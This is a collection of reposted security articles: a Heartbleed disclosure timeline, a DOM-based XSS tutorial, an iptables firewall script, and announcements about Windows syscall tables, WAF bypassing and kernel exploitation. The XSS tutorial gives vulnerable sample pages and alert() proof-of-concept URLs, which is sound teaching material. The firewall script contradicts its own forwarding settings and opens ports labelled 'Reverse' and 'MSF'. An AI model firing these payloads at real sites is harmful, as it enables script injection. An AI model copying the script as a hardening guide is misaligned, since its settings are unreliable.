If not all HTTP content is served over TLS, an attacker could inject JavaScript code which extracts your password, or simply sniff the session cookie before or after. The bridge between plaintext and TLS in HTTP is a weak point. The HTTP HSTS header mitigates this particular threat.

If a cipher suite without perfect forward secrecy is used, then an attacker can at a later point use the server's private key to decrypt historically captured traffic.

Other stuff

Do not allow other users to read your files:

chmod 700 $HOME

Some people tend to use the recursive option (-R) indiscriminately, which modifies all child folders and files, but this is not necessary and may yield other undesirable results. Restricting the parent directory alone is sufficient for preventing unauthorized access to anything below it.

Put tape over the webcam.

Other decent resources

Surveillance Self-Defense

Written 2014-04-19 by dag

Sursa: https://dvikan.no/paranoid-security-lockdown-of-laptop
-
Heartbleed disclosure timeline: who knew what and when

April 15, 2014
Ben Grubb

Ever since the "Heartbleed" flaw in encryption protocol OpenSSL was made public on April 7 in the US there have been various questions about who knew what and when. Fairfax Media has spoken to various people and groups involved and has compiled the below timeline.

If you have further information or corrections - especially information about what occurred prior to March 21 at Google - please email the author: bgrubb@fairfaxmedia.com.au. Click here for his PGP key.

All times are in US Pacific Daylight Time

Friday, March 21 or before - Neel Mehta of Google Security discovers the Heartbleed vulnerability.

Friday, March 21 10:23 - Bodo Moeller and Adam Langley of Google commit a patch for the flaw. (This is according to the timestamp on the patch file Google created and later sent to OpenSSL, which OpenSSL forwarded to Red Hat and others.) The patch is then progressively applied to Google services/servers across the globe.

Monday, March 31 or before - Someone tells content distribution network CloudFlare about Heartbleed and they patch against it. CloudFlare later boasts on its blog about how they were able to protect their clients before many others. CloudFlare chief executive officer Matthew Prince would not tell Fairfax how his company found out about the flaw early. "I think the most accurate reporting of events with regard to the disclosure process, to the extent I know them, was written by Danny over at the [Wall Street Journal]," he says. The article says CloudFlare was notified of the bug the week before last and made the recommended fix "after signing a non-disclosure agreement".

In a separate article, The Verge reports that a CloudFlare staff member "got an alarming message from a friend" which requested that they send the friend their PGP email encryption key as soon as possible.
"Only once a secure channel was established and a non-disclosure agreement was in place could he share the alarming news" about the bug, The Verge reported.

On April 17, CloudFlare says in a blog that when it was informed it did not know then that it was among the few to whom the bug was disclosed before the public announcement. "In fact, we did not even know the bug's name. At that time we had simply removed TLS heartbeat functionality completely from OpenSSL..."

Tuesday, April 1 - Google Security notifies "OpenSSL team members" about the flaw it has found in OpenSSL, which later becomes known as "Heartbleed", Mark Cox at OpenSSL says on social network Google Plus.

Tuesday, April 1 04:09 - "OpenSSL team members" forward Google's email to OpenSSL's "core team members". Cox at OpenSSL says the following on Google Plus: "Original plan was to push [a fix] that week, but it was postponed until April 9 to give time for proper processes." Google tells OpenSSL, according to Cox, that they had "notified some infrastructure providers under embargo". Cox says OpenSSL does not have the names of providers Google told or the dates they were told. Google declined to tell Fairfax which partners it had told. "We aren't commenting on when or who was given a heads up," a Google spokesman said.

Wednesday, April 2 ~23:30 - Finnish IT security testing firm Codenomicon separately discovers the same bug that Neel Mehta of Google found in OpenSSL. A source inside the company gives Fairfax the time it was found as 09:30 EEST April 3, which converts to 23:30 PDT, April 2.

Thursday, April 3 04:30 - Codenomicon notifies the National Cyber Security Centre Finland (NCSC-FI) about its discovery of the OpenSSL bug. Codenomicon tells Fairfax in a statement that they're not willing to say whether they disclosed the bug to others. "We have strict [non-disclosure agreements] which do not allow us to discuss any customer engagements.
Therefore, we do not want to weigh in on the disclosure debate," a company spokeswoman says. A source inside the company later tells Fairfax: "Our customers were not notified. They first learned about it after OpenSSL went public with the information."

Friday, April 4 - Content distribution network Akamai patches its servers. They initially say OpenSSL told them about the bug, but the OpenSSL core team denies this in an email interview with Fairfax. Akamai updates its blog after the denial - prompted by Fairfax - and Akamai's blog now says an individual in the OpenSSL community told them. Akamai's chief security officer, Andy Ellis, tells Fairfax: "We've amended the blog to specific [sic] a member of the community; but we aren't going to disclose our source." It's well known a number of OpenSSL community members work for companies in the tech sector that could be connected to Akamai.

Friday, April 4 - Rumours begin to swirl in the open source community about a bug existing in OpenSSL, according to one security person at a Linux distribution Fairfax spoke to. No details were apparent so it was ignored by most.

Saturday, April 5 15:13 - Codenomicon purchases the Heartbleed.com domain name, where it later publishes information about the security flaw.

Saturday, April 5 16:51 - OpenSSL (not public at this point) publishes this (since taken offline) to its Git repository.

Sunday, April 6 02:30 - The National Cyber Security Centre Finland asks the CERT Coordination Centre (CERT/CC) in America to be allocated a Common Vulnerabilities and Exposures (CVE) number "on a critical OpenSSL issue" without disclosing what exactly the bug is. CERT/CC is located at the Software Engineering Institute, a US government funded research centre operated by Carnegie Mellon University. The centre was created in 1988 at DARPA's direction in response to the Morris worm incident.
Sunday, April 6 ~22:56 - Mark Cox of OpenSSL (who also works for Red Hat and was on holiday) notifies Linux distribution Red Hat about the Heartbleed bug and authorises them to share details of the vulnerability on behalf of OpenSSL with other Linux operating system distributions.

Sunday, April 6 22:56 - Huzaifa Sidhpurwala (who works for Red Hat) adds a (then private) bug to Red Hat's bugzilla.

Sunday, April 6 23:10 - Huzaifa Sidhpurwala sends an email about the bug to a private Linux distribution mailing list with no details about Heartbleed but an offer to request them privately under embargo. Sidhpurwala says in the email that the issue would be made public on April 9. Cox of OpenSSL says on Google Plus: "No details of the issue are given: just affected versions [of OpenSSL]. Vendors are told to contact Red Hat for the full advisory under embargo."

Sunday, April 6 ~23:10 - A number of people on the private mailing list ask Sidhpurwala, who lives in India, for details about the bug. Sidhpurwala gives details of the issue, advisory, and patch to the operating system vendors that replied, under embargo. Those who got a response included SuSE (Monday, April 7 at 01:15), Debian (01:16), FreeBSD (01:49) and AltLinux (03:00). "Some other [operating system] vendors replied but [Red Hat] did not give details in time before the issue was public," Cox said. Sidhpurwala was asleep during the time the other operating system vendors requested details. "Some of them mailed during my night time. I saw these emails the next day, and it was pointless to answer them at that time, since the issue was already public," Sidhpurwala says. Those who attempted to ask and were left without a response included Ubuntu (asked at 04:30), Gentoo (07:14) and Chromium (09:15), says Cox.

Prior to Monday, April 7 or early April 7 - Facebook gets a heads up, people familiar with the matter tell the Wall Street Journal.
Facebook say after the disclosure: "We added protections for Facebook's implementation of OpenSSL before this issue was publicly disclosed, and we're continuing to monitor the situation closely." An article on The Verge suggests Facebook got an encrypted email message from a friend in the same way CloudFlare did.

Monday, April 7 08:19 - The National Cyber Security Centre Finland reports Codenomicon's OpenSSL "Heartbleed" bug to OpenSSL core team members Ben Laurie (who works for Google) and Mark Cox (Red Hat) via encrypted email.

Monday, April 7 09:11 - The encrypted email is forwarded to the OpenSSL core team members, who then decide, according to Cox, that "the coincidence of the two finds of the same issue at the same time increases the risk while this issue remained unpatched. OpenSSL therefore released updated packages [later] that day."

Monday, April 7 09:53 - A fix for the OpenSSL Heartbleed bug is committed to OpenSSL's Git repository (at this point private). Confirmed by a Red Hat employee: "At this point it was private."

Monday, April 7 10:21:29 - A new OpenSSL version is uploaded to OpenSSL's web server with the filename "openssl-1.0.1g.tgz".

Monday, April 7 10:27 - OpenSSL publishes a Heartbleed security advisory on its website (website metadata shows the time as 10:27 PDT).

Monday, April 7 10:49 - OpenSSL issues a Heartbleed advisory via its mailing list. It takes time to get around.

Monday, April 7 11:00 - CloudFlare posts a blog entry about the bug.

Monday, April 7 12:23 - CloudFlare tweets about its blog post.

Monday, April 7 12:37 - Google's Neel Mehta comes out of Twitter hiding to tweet about the OpenSSL flaw.

Monday, April 7 13:13 - Codenomicon tweets they found the bug too and link to their Heartbleed.com website.

Monday, April 7 ~13:13 - Most of the world finds out about the issue through heartbleed.com.

Monday, April 7 15:01 - Ubuntu comes out with a patch.
Monday, April 7 23:45 - The National Cyber Security Centre Finland issues a security advisory on its website in Finnish.

Tuesday, April 8 ~00:45 - The National Cyber Security Centre Finland issues a security advisory on its website in English.

Wednesday, April 9 - A Red Hat technical administrator for cloud security, Kurt Seifried, says in a public mailing list that Red Hat and OpenSSL tried to coordinate disclosure. But Seifried says things "blew up" when Codenomicon reported the bug too. "My understanding is that OpenSSL made this public due to additional reports. I suspect it boiled down to 'Group A found this flaw, reported it, and has a reproducer, and now Group B found the same thing independently and also has a reproducer. Chances are the bad guys do as well so better to let everyone know the barn door is open now rather than wait 2 more days'. But there may be other factors I'm not aware [of]," Seifried says.

Wednesday, April 9 - A Debian developer, Yves-Alexis Perez, says on the same mailing list: "I think we would have managed to handle it properly if the embargo didn't break."

Wednesday, April 9 - Facebook and Microsoft donate $US15,000 to Neel Mehta via the Internet Bug Bounty program for finding the OpenSSL bug. Mehta gives the funds to the Freedom of the Press Foundation.

Monday, April 14 ~12:30pm - The Guardian reports a mothers' forum with 1.5 million users called Mumsnet is impacted by Heartbleed. A "hacker" reportedly breached the admin's user account.

Monday, April 14 - The Canada Revenue Agency announces social insurance numbers of approximately 900 taxpayers were removed from its systems by someone exploiting the Heartbleed vulnerability.

Wednesday, April 16 - A Canadian teen is arrested for stealing tax data with Heartbleed.

Who knew of Heartbleed prior to release?
Google (March 21 or prior), CloudFlare (March 31 or prior), OpenSSL (April 1), Codenomicon (April 2), National Cyber Security Centre Finland (April 3), Akamai (April 4 or earlier) and Facebook (no date given).

Who knew hours before public release?

SuSE, Debian, FreeBSD and AltLinux.

Who didn't know until public release?

Many, including Amazon Web Services, Twitter, Yahoo, Ubuntu, Cisco, Juniper, Pinterest, Tumblr, GoDaddy, Flickr, Minecraft, Netflix, Soundcloud, Commonwealth Bank of Australia (main website, not net banking website), CERT Australia website, Instagram, Box, Dropbox, GitHub, IFTTT, OKCupid, Wikipedia, Wordpress and Wunderlist.

Many thanks to: Nik Cubrilovic, Yves-Alexis Perez, public mailing lists, emails with the OpenSSL core team, emails with the National Cyber Security Centre Finland, Google Plus posts, and emails with people who volunteer at Linux distributions.

Corrections/updates:

April 15, 4.14pm AEST: Some Codenomicon dates were wrong. They have been fixed.
April 16, 6.04pm AEST: Added another significant event that occurred on Sunday, April 6 02:30 PDT.
April 16, 9.57pm AEST: Added details about the time OpenSSL core team members found out about Heartbleed from Google.
April 18, 6.18pm AEST: Added information about the Canadian tax agency breach, the Canadian teen getting arrested for it, and details from this blog post from CloudFlare.

Sursa: Heartbleed disclosure timeline: who knew what and when
-
Windows System Call and CSR API tables updated

Having the first spare weekend in a really long time, I have decided it was high time to update some (all) of the tables related to Windows system calls and CSR API I once created and now try to maintain. This includes NT API syscalls for the 32-bit and 64-bit Intel platforms, win32k.sys syscalls for 32-bit and 64-bit Intel platforms, as well as CSR API information formatted in two different ways for convenience (a list and a table).

Without further ado, all of the tables now contain up-to-date data covering all operating systems available to me at the time, including Windows 8, 8.1 and Server 2012. The links are as follows:

NT system calls

Windows X86 System Call Table (NT/2000/XP/2003/Vista/2008/7/8)
Windows X86-64 System Call Table (NT/2000/XP/2003/Vista/2008/7/2012/8)

Win32k.sys system calls

Windows WIN32K.SYS System Call Table (NT/2000/XP/2003/Vista/2008/7/8)
Windows x86-64 WIN32K.SYS System Call Table (NT/2000/XP/2003/Vista/2008/7/2012/8)

CSR API calls

Windows CSRSS API List (NT/2000/XP/2003/Vista/2008/7/2012/8)
Windows CSRSS API Table (NT/2000/XP/2003/Vista/2008/7/2012/8)

Pointers to all tables can also be found in the left pane under the "OS Structures" section. If you spot a bug in any of the tables or have any other comments, let me know. I hope you find them useful!

Sursa: Windows System Call and CSR API tables updated | j00ru//vx tech blog
-
Cross-site scripting (XSS) has been a problem for well over a decade now. XSS, just like other well-known security issues such as SQL, XPath and LDAP injection, falls into the category of input validation attacks. An XSS vulnerability occurs when input taken from the user is not filtered/sanitized before it is returned back to the user. XSS can be divided into the following three categories:

1) Reflected XSS
2) Stored XSS
3) DOM Based XSS

As time has passed, the security community has come up with lots of solutions to mitigate XSS attacks, such as encoding libraries, web application filters based upon blacklists, browser-based XSS filters, Content Security Policy, etc. However, all of them have limitations and fail to mitigate XSS attacks in certain contexts. For example: HTML Purifier is a well-known PHP protection library that offers great protection against XSS attacks in lots of different contexts, yet it currently has no support for HTML5. Content Security Policy, dubbed the best solution for mitigating XSS attacks, has no support for inline JS as well as no support for mobile browsers.

Still, traditional XSS, where the input is sent to the server and returned without any sanitization, has been mitigated to some extent. But what happens when the user input is never sent to the server side and gets executed on the client side? In that case all the server-side defenses fail, because the payload never arrives at the server. This is what is referred to as DOM based XSS: the payload is never sent to the server and is executed on the client side. In order to understand DOM based XSS better, we first need to understand what the DOM is.

What is DOM?

DOM stands for Document Object Model, and it is JavaScript's way of accessing the page. Each and every HTML element has a corresponding entity inside the DOM.

What is DOM Based XSS?
A DOM based XSS vulnerability occurs when data from a source reaches a sink without any sanitization. A source is commonly referred to as anything that takes input, which in JavaScript is essentially "everything taken from a URL". Common sources inside JavaScript are document.URL, location.hash, location.href and document.referrer. A more detailed list is available at the DOM based XSS wiki.

A sink is anything that creates HTML (or executes code) in an insecure way. There is a wide variety of different sinks depending upon the JavaScript library you use. For example: in plain JavaScript, document.write, innerHTML and eval are the most commonly found sinks, whereas in jQuery we have .html(), .appendTo(), etc. A list of commonly used sinks is also available at the DOM based XSS wiki.

How to find DOM Based XSS?

There are a couple of different approaches to detecting DOM based XSS, such as black box fuzzing, static analysis and dynamic analysis. We will discuss all three of them.

Black Box Fuzzing

In the black box fuzzing approach, we try injecting different XSS vectors into different JavaScript sources, hoping for JavaScript to be executed. A tool called Ra-2 is an example of the black box fuzzing approach towards DOM based XSS. The fundamental problem with this approach is that it is not context aware and produces several false negatives.
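In shell terms, the black-box approach boils down to enumerating candidate vectors against each URL-carried source and then watching for script execution. A trivial generator sketch (the target URL and the vector list are made up for illustration):

```shell
target='http://www.example.com/page'

# A tiny illustrative payload list, one candidate vector per line
cat > payloads.txt <<'EOF'
<script>alert(1)</script>
<img src=x onerror=alert(1)>
javascript:alert(1)
EOF

# Emit one test URL per payload for both the query string and the fragment
# (the fragment variant is never sent to the server at all)
while IFS= read -r p; do
  printf '%s?name=%s\n' "$target" "$p"
  printf '%s#name=%s\n' "$target" "$p"
done < payloads.txt | tee fuzz_urls.txt
```

In a real fuzzer these URLs would then be loaded in an instrumented browser; without that step you cannot tell whether a payload actually executed, which is exactly the context-awareness problem mentioned above.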
Static Analysis

Another approach to detecting DOM based XSS is performing static source code analysis, whereby we try to find the sources and sinks and trace whether a source reaches a sink. The DOM based XSS wiki contains a list of regular expressions which help you find sources/sinks. The following regular expressions help determine the sources and sinks in a JavaScript file.

Finding sources:

/(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/

Finding JavaScript sinks:

/((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/

Finding jQuery-based sinks:

/after\(|\.append\(|\.before\(|\.html\(|\.prepend\(|\.replaceWith\(|\.wrap\(|\.wrapAll\(|\$\(|\.globalEval\(|\.add\(|jQUery\(|\$\(|\.parseHTML\(/

JSPrime and IBM AppScan apply this particular approach to detecting DOM based XSS. The fundamental problem with this approach is that JavaScript code may be compressed, packed or obfuscated, in which case static analysis won't help us. Also, where code is encoded, then decoded and executed at runtime, a static code analyzer won't be able to detect it. An example would be the following statement:

eval('var a'+'=loc'+'ation'+'.hash');

The string is split into pieces which are joined together in memory at runtime and executed via the eval function.

Dynamic Analysis

As mentioned above, a static code analyzer won't be able to detect obfuscated code or code which is only assembled at run-time. For that case, we have another approach, called dynamic taint tracking.
A taint flag is added to the source and tracked until it reaches a sink at run-time. DOMinator is currently the only tool in the market that utilizes this methodology; however, there are several aspects in which DOMinator is not effective:

1) Human interaction is necessary for the analysis to be performed.
2) If a human misses testing a feature, DOMinator misses it as well.
3) Better dynamic taint tracking is required.

Let's now talk about a few examples.

Example:

<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT>
<BR>
Welcome to our system …
</HTML>

The following code is taken from Amit Klein's paper on DOM based XSS. In the above script we see the JavaScript source document.URL taking input from the URL. The indexOf property searches for the name parameter inside the URL and the resulting offset is saved in the "pos" variable; the user input starting at "pos" is then written directly to the DOM without any sanitization. By inserting the following payload, JavaScript is executed, completing the DOM based XSS attack:

http://www.target.com/page?name=<script>alert(1);</script>

In the above case one might argue that the payload is still sent to the server in the initial request, but in the following variant, where we place a hash before the name variable, the payload is never sent to the server:

http://www.target.com/page?#name=<script>alert(1);</script>

Let's take a look at another example:

<html>
<body>
<h2>POC for settimeout DOMXSS</h2>
<script>
var i=location.hash.split('#')[1];
(function () {
setTimeout(i,3000);
})();
</script>
</body>
</html>

In this case, the source is location.hash; the split function splits up everything after the hash, and the user input is stored in the variable "i", which is later executed via the setTimeout() function, a known JavaScript sink.
The following triggers an alert after three seconds:

http://www.target.com/page.html#alert(1)

Example 3:

<script>
var redir = location.hash.split("#")[1];
x = document.getElementById('anchor');
x.setAttribute('href',redir);
</script>

The following is another very simple example of DOM based XSS. The input is taken from location.hash and stored in the redir variable. Next, we use the getElementById method to search for an anchor element with id "anchor", and the value of redir is assigned to the href attribute via the setAttribute API. The sink in this case is href. You may try replacing href with src and it would still result in JavaScript being executed.

Cross Browser Detection

Some browsers encode special characters taken from a particular source before displaying them back to the DOM, and for this reason a DOM based XSS vulnerability might trigger in one browser but not in another. For example: Firefox encodes everything sent after ?, whereas Internet Explorer doesn't. A list of these characters has already been compiled on the DOM based XSS wiki. Consider spending some time reviewing it:

https://code.google.com/p/domxsswiki/wiki/LocationSources

Defending Against DOM Based XSS

The following steps shall be taken to mitigate DOM based XSS attacks:

1) Unsafe sinks shall not be used; they shall be replaced with safe methods. For example: innerHTML is classified as a dangerous sink, but innerText, a safe DOM method, can be used in its place. Similarly in jQuery, .html() (the equivalent of JavaScript's innerHTML) is classified as a dangerous method; alternatively we have the .text() method to safely write things to the DOM.

2) As there are several different JavaScript libraries, the community should make an effort to classify all the dangerous sinks in each particular library and introduce safe methods.

This concludes the introductory post on DOM based XSS. Stay tuned for part 2.
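To make the static-analysis idea concrete, here is a deliberately simplified grep pass over a sample file (the patterns below are a small subset of the full regular expressions listed earlier, and sample.js is fabricated for the demo):

```shell
# A small sample file containing one source flowing into two sinks
cat > sample.js <<'EOF'
var name = location.hash.split('#')[1];
document.write(name);
document.getElementById('x').innerHTML = name;
var safe = "just a string";
EOF

# Flag likely sinks (simplified subset of the sink regexes)
grep -nE 'document\.write|innerHTML|eval\(|setTimeout\(' sample.js

# Flag likely sources (simplified subset of the source regexes)
grep -nE 'location\.(hash|href|search)|document\.(URL|referrer)' sample.js
```

A hit from both passes is only a lead, not proof; you still have to trace whether the tainted value actually reaches the sink, which is where tools like JSPrime and DOMinator go further.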
Sursa: DOM XSS Explained - Part 1 | Learn How To Hack - Ethical Hacking and security tips
-
ABSTRACT

Readers, there are numerous reasons ... It is well known that the Internet is an unmanaged and decentralized network, running under a set of protocols which are not designed to ensure the integrity and confidentiality of information and access controls. There are several ways to breach a network, but these ways do nothing more than take advantage of flaws within network protocols and services.

CONCEPTS

IPTABLES is an editing tool for packet filtering; with it you can analyze packet headers and make decisions about the destinations of these packets. It is not the only existing solution to control this filtering: we still have the old ipfwadm and ipchains, etc. It is important to note that in GNU/Linux, packet filtering is built into the kernel. Why not configure your installation in accordance with this article, since most distributions come with it enabled as a module or compiled directly into the kernel.

STEP BY STEP

case "$1" in
start)

# Clearing rules
iptables -t filter -F
iptables -t filter -X

# Drop [ICMP ECHO-REQUEST] messages sent to broadcast or multicast
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

# Protection against ICMP redirect requests
echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects

# Do not send ICMP redirect messages
echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects

# (Ping) ICMP
iptables -t filter -A INPUT -p icmp -j ACCEPT
iptables -t filter -A OUTPUT -p icmp -j ACCEPT

# Log packets with nonexistent addresses (due to wrong routes) on your network
echo 1 > /proc/sys/net/ipv4/conf/all/log_martians

# Enable packet forwarding (required for NAT)
echo "1" > /proc/sys/net/ipv4/ip_forward

# SSH accepted
iptables -t filter -A INPUT -p tcp --dport 22 -j ACCEPT

# Do not break established connections
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

# Block all connections by default
iptables -t filter -P INPUT DROP
iptables -t filter -P FORWARD DROP
iptables -t filter -P OUTPUT DROP

# IP spoofing protection
echo "1" > /proc/sys/net/ipv4/conf/default/rp_filter
echo "- Enabling IP spoofing protection: [OK]"

# Disable IPv4 forwarding (note: this overrides the forwarding enabled
# above; keep only one of the two, depending on whether this host does NAT)
echo 0 > /proc/sys/net/ipv4/ip_forward

# SYN flood protection
iptables -N syn-flood
iptables -A syn-flood -m limit --limit 10/second --limit-burst 50 -j RETURN
iptables -A syn-flood -j LOG --log-prefix "SYN FLOOD: "
iptables -A syn-flood -j DROP

# Loopback
iptables -t filter -A INPUT -i lo -j ACCEPT
iptables -t filter -A OUTPUT -o lo -j ACCEPT

# Drop connection scans (LOG rules come before DROP rules throughout,
# otherwise the dropped packets would never reach the LOG target)
iptables -A INPUT -m recent --name scan --update --seconds 600 --rttl --hitcount 3 -j LOG --log-level info --log-prefix "Scan recent"
iptables -A INPUT -m recent --name scan --update --seconds 600 --rttl --hitcount 3 -j DROP

# Drop invalid SYN packets (inbound)
iptables -A INPUT -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j LOG --log-level info --log-prefix "Packages SYN Detected"
iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j LOG --log-level info --log-prefix "Packages SYN Detected"
iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j LOG --log-level info --log-prefix "Packages SYN Detected"
iptables -A INPUT -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP

# Drop invalid SYN packets (outbound)
iptables -A OUTPUT -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j LOG --log-level info --log-prefix "Packages SYN Detected"
iptables -A OUTPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j LOG --log-level info --log-prefix "Packages SYN Detected"
iptables -A OUTPUT -p tcp --tcp-flags SYN,RST SYN,RST -j LOG --log-level info --log-prefix "Packages SYN Detected"
iptables -A OUTPUT -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
iptables -A OUTPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
iptables -A OUTPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP

# Make sure new packets are SYN; otherwise drop them
iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP

# Drop incoming fragmented packets (fragmentation attacks can cause data loss)
iptables -A INPUT -f -j LOG --log-level info --log-prefix "Packages fragmented entries"
iptables -A INPUT -f -j DROP

# Drop malformed XMAS packets
iptables -A INPUT -p tcp --tcp-flags ALL ALL -j LOG --log-level info --log-prefix "malformed XMAS packets"
iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP

# DNS in/out
iptables -t filter -A OUTPUT -p tcp --dport 53 -j ACCEPT
iptables -t filter -A OUTPUT -p udp --dport 53 -j ACCEPT
iptables -t filter -A INPUT -p tcp --dport 53 -j ACCEPT
iptables -t filter -A INPUT -p udp --dport 53 -j ACCEPT

# NTP out
iptables -t filter -A OUTPUT -p udp --dport 123 -j ACCEPT

# WHOIS out
iptables -t filter -A OUTPUT -p tcp --dport 43 -j ACCEPT

# FTP out
iptables -t filter -A OUTPUT -p tcp --dport 20:21 -j ACCEPT
iptables -t filter -A OUTPUT -p tcp --dport 30000:50000 -j ACCEPT

# FTP in
iptables -t filter -A INPUT -p tcp --dport 20:21 -j ACCEPT
iptables -t filter -A INPUT -p tcp --dport 30000:50000 -j ACCEPT
iptables -t filter -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# HTTP + HTTPS out
iptables -t filter -A OUTPUT -p tcp --dport 80 -j ACCEPT
iptables -t filter -A OUTPUT -p tcp --dport 443 -j ACCEPT

# HTTP + HTTPS in
iptables -t filter -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -t filter -A INPUT -p tcp --dport 443 -j ACCEPT

# Mail SMTP:25
iptables -t filter -A INPUT -p tcp --dport 25 -j ACCEPT
iptables -t filter -A OUTPUT -p tcp --dport 25 -j ACCEPT

# Mail POP3:110
iptables -t filter -A INPUT -p tcp --dport 110 -j ACCEPT
iptables -t filter -A OUTPUT -p tcp --dport 110 -j ACCEPT

# Mail IMAP:143
iptables -t filter -A INPUT -p tcp --dport 143 -j ACCEPT
iptables -t filter -A OUTPUT -p tcp --dport 143 -j ACCEPT

# Reverse
iptables -t filter -A INPUT -p tcp --dport 77 -j ACCEPT
iptables -t filter -A OUTPUT -p tcp --dport 77 -j ACCEPT

# MSF
iptables -t filter -A INPUT -p tcp --dport 7337 -j ACCEPT
iptables -t filter -A OUTPUT -p tcp --dport 7337 -j ACCEPT

# WEB management firewall logging. The LOG target writes to the kernel log;
# point your syslog daemon at /var/log/firewall to collect the prefixed
# messages there. (The original article mistakenly invoked the log file
# itself as a command; these must be iptables rules.)
touch /var/log/firewall
chmod 600 /var/log/firewall
iptables -A INPUT -p icmp -m limit --limit 1/s -j LOG --log-level info --log-prefix "ICMP Dropped "
iptables -A INPUT -p tcp -m limit --limit 1/s -j LOG --log-level info --log-prefix "TCP Dropped "
iptables -A INPUT -p udp -m limit --limit 1/s -j LOG --log-level info --log-prefix "UDP Dropped "
iptables -A INPUT -f -m limit --limit 1/s -j LOG --log-level warning --log-prefix "FRAGMENT Dropped "
iptables -A INPUT -m limit --limit 1/minute --limit-burst 3 -j LOG --log-level DEBUG --log-prefix "IPT INPUT packet died: "
iptables -A INPUT -m limit --limit 3/minute --limit-burst 3 -j LOG --log-level DEBUG --log-prefix "IPT INPUT packet died: "

exit 0
;;

stop)
echo "Turning off the firewall"
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t filter -F
exit 0
;;

restart)
/etc/init.d/firewall stop
/etc/init.d/firewall start
;;

*)
echo "Use: /etc/init.d/firewall {start|stop|restart}"
exit 1
;;
esac

Logs available: /var/log/firewall

COMMANDS TO MONITOR LOGS:

tail -f /var/log/messages

Save the script as: /etc/init.d/firewall

CONCLUSION

Gentlemen, I hope this helps you in configuring your network security, and reminds you to choose only the best options available. Allow me to add a few advantages of using your firewall. Be sure to block unknown and unauthorized connections. You can specify what types of network protocols and services are to be provided, and you may control the packets from any untrusted services. Your firewall also allows blocking websites with URL filters, access control, access logs for per-user reports, protecting the corporate network through proxies, and automatic address translation (NAT). Control which services can and cannot be executed on the network, allowing for high performance with easy administration and reliability.

Sursa: A Beginners Guide To Using IPTables | Learn How To Hack - Ethical Hacking and security tips
-
Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters

Last month I was asked by my university teacher "Sir Asim Ali" to write a paper on any topic related to "Computer Architecture" as a semester project. I was particularly interested in writing security related stuff, be it related to computer architecture, networks, etc. However, I found that lots of work has already been done on architecture-level security. Therefore, I convinced my teacher that I would write on "Bypassing Modern Web Application Firewalls", as some of you might know that most of my research is related to client side vulnerabilities and bypassing WAFs. In my day to day job as a penetration tester, it's very common that I encounter a web application firewall/filter that looks for malicious traffic inside the HTTP request and filters it out; some of them are easy to break and some of them are very hard. However, in one context or another, all the WAFs I have encountered are bypassable at some point. RSnake's XSS cheat sheet was one of the best resources available for bypassing WAFs; however, over time, as browsers got updated, lots of the vectors stopped working in newer browsers. Therefore there was a need to create a new cheat sheet. Over time I have developed my own methodology for bypassing WAFs, and that's what I have written the paper on. The paper talks specifically about bypassing XSS filters; as for SQLi, RCE, etc., I plan to write a different paper, as the techniques differ in many cases. Download: WAF_Bypassing_By_RAFAYBALOCH Sursa: Bypassing Modern WAF's XSS Filters - Cheat Sheet | Learn How To Hack - Ethical Hacking and security tips
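To make the point concrete, here is a toy example of why blacklist-style XSS filtering keeps failing. The filter function below is a made-up illustration, not one taken from the paper:

```python
import re

# A toy blacklist of the kind weak WAFs implement: block the obvious
# "<script>" vector and nothing else. Returns True if input is allowed.
def naive_xss_filter(value):
    return re.search(r'<\s*script', value, re.IGNORECASE) is None

blocked = "<script>alert(1)</script>"
bypass = "<svg onload=alert(1)>"  # event-handler vector, no <script> tag

print(naive_xss_filter(blocked))  # False: the filter catches it
print(naive_xss_filter(bypass))   # True: the payload slips through
```

Any vector built from event handlers, exotic encodings or less common tags sails past such a blacklist, which is why fingerprinting the filter and picking a vector it does not know about works so often.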
-
[h=3]December HZV Meet : Linux Kernel Exploitation [/h]Hello,

So, last Saturday, I gave a talk about Linux kernel exploitation. I went over some well known vulnerabilities and I ended with a demo on a kernel exploitation challenge (here) by Jason Donenfeld (his site). The slides are at the end of this blog article. In this post, I will detail some of the slides a bit more. I will not detail every single slide, only the ones where I think there aren't enough details. If you don't understand something, don't hesitate to comment. So, let's dig in.

[h=2]Linux Kernel[/h]
The kernel has LOTS of code: 15+ million lines of it. LOTS of code means complexity, complexity means bugs and bugs mean potential vulnerabilities. Anyhow, the main gateways for users to interact with the kernel are syscalls and IOCTLs. Behind a syscall, especially the network ones, there is a TON of code. Effectively, for a bind() call, you always have the same interface, right? Well, the kernel finds the corresponding structure using the socket descriptor you pass to your bind() call. In that structure, there is what is called a struct proto_ops, which contains the callbacks for the corresponding protocol.

[h=2]Exploiting the Linux Kernel[/h]
